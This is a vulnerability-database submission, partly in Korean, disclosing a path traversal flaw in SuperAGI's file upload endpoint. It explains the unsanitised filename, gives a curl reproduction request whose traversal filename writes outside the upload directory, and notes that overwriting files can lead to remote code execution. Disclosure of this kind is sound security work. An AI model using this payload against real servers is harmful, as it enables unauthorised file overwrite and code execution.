제출 #791083: SuperAGI up to c3c1982 Path Traversal (CWE-22)정보

제목	SuperAGI up to c3c1982 Path Traversal (CWE-22)
설명	# Technical Details An Arbitrary File Write vulnerability via Path Traversal exists in the `upload` function in `superagi/controllers/resources.py` of SuperAGI. The application fails to sanitize the `file.filename` attribute from the HTTP multipart upload before joining it with the base storage directory. The extension check is only applied to the `name` field (not the actual filename), allowing an attacker to bypass the check and write files to arbitrary locations on the server. # Vulnerable Code File: superagi/controllers/resources.py (lines 71-77) Method: upload Why: The application performs an extension check on the `name` field of the form data, but constructs the file path using the unsanitized `file.filename` attribute. Path traversal sequences (e.g., `../../`) in `file.filename` are preserved, allowing writes outside the intended upload directory. In the default development environment, the endpoint lacks authentication enforcement. # Reproduction 1. Ensure SuperAGI backend is running. 2. Send the following request with a path traversal payload in the filename: curl -s -X POST "http://127.0.0.1:8001/resources/add/1" -F "name=legit_name.txt" -F "size=24" -F "type=text/plain" -F "file=@/tmp/payload.txt;filename=../../../../../../../../../../tmp/pwned_traversal.txt" 3. Verify file was written: docker exec -it superagi-backend cat /tmp/pwned_traversal.txt # Impact - Arbitrary File Write: Attacker can write files to any location on the server filesystem. - Remote Code Execution: By overwriting Python library files, startup scripts, or configuration files, the attacker can achieve RCE. - The vulnerability is exploitable with no authentication in the default development environment (CVSS: Critical).
원천	⚠️ https://gist.github.com/YLChen-007/300843c707435540ce0e23bff3e6173a
사용자	Eric-y (UID 95889)
제출	2026. 03. 27. PM 01:03 (24 날 ago)
모더레이션	2026. 04. 19. PM 06:13 (23 days later)
상태	수락
VulDB 항목	358250 [TransformerOptimus SuperAGI 까지 0.0.14 Multipart Upload resources.py upload 이름 디렉토리 순회]
포인트들	20

◂ 이전 개요 다음 ▸

Might our Artificial Intelligence support you?

Check our Alexa App!